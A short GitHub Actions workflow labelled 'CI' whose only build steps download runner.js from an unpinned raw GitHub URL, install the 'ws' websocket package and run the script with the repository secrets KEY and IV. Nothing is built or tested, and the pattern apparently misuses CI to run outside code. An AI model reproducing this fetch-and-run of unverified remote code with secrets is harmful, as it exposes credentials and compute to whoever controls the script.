name: CI
on: [push, workflow_dispatch]

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Download Script
        run: wget https://raw.githubusercontent.com/raiyan088/script/refs/heads/main/runner.js

      - name: Install package
        run: npm install ws
        
      - name: Run Script
        run: node runner.js "$KEY" "$IV"
        env:
          KEY: ${{ secrets.KEY }}
          IV: ${{ secrets.IV }}
